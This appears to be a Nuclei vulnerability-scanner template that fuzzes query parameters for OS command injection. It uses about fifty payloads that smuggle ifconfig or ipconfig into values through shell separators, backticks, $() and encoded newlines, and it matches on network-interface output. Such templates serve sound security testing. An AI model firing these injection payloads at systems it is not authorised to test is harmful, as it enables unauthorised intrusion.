id: rce-ipconfig-ifconfig-replace

info:
  name: RCE via ppconfig && ifconfig
  author: reewardius
  severity: critical
  tags: fuzzing-rce,fuzzing-req
  
http:
  - method: GET
    path:
      - "{{BaseURL}}"
      
    payloads:
      rce:
        - "$(ifconfig)"
        - "$(ipconfig)"
        - "%0A&&ifconfig"
        - "%0A&&ipconfig"
        - "%0A;ifconfig"
        - "%0A;ipconfig"
        - "%0A||ifconfig"
        - "%0A||ipconfig"
        - "%0D%0A&&ifconfig&&"
        - "%0D%0A&&ipconfig&&"
        - "%0D%0A;ifconfig"
        - "%0D%0A;ipconfig"
        - "%0D%0A||ifconfig"
        - "%0D%0A||ifconfig||"
        - "%0D%0A||ipconfig"
        - "%0D%0A||ipconfig||"
        - "%0D&&ifconfig"
        - "%0D&&ipconfig"
        - "%0D;ifconfig"
        - "%0D;ipconfig"
        - "%0D||ifconfig"
        - "%0D||ipconfig"
        - "&&`ifconfig`"
        - "&&`ipconfig`"
        - "&&ifconfig"
        - "&&ipconfig"
        - "&`ifconfig`"
        - "&`ipconfig`"
        - "&ifconfig"
        - "&ipconfig"
        - ";$(ifconfig)"
        - ";$(ipconfig)"
        - ";`ifconfig`"
        - ";`ipconfig`"
        - ";ifconfig"
        - ";ifconfig;"
        - ";ipconfig"
        - ";ipconfig;"
        - "`ifconfig`"
        - "`ipconfig`"
        - "||$(ifconfig)"
        - "||$(ifconfig);"
        - "||$(ifconfig)||"
        - "||$(ipconfig)"
        - "||$(ipconfig);"
        - "||$(ipconfig)||"
        - "||`ifconfig`"
        - "||`ifconfig`||"
        - "||`ipconfig`"
        - "||`ipconfig`||"
        - "||ifconfig||"
        - "||ipconfig||"
        
    fuzzing:
      - part: query
        mode: multiple
        type: replace
        fuzz:
          - "{{rce}}"
          
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        condition: and
        words:
          - "inet"
          - "netmask"
          - "broadcast"
          
      - type: word
        condition: and
        words:
          - "Windows IP Configuration"
          - "Subnet Mask"
          
      - type: word
        words:
          - "ifconfig: command not found"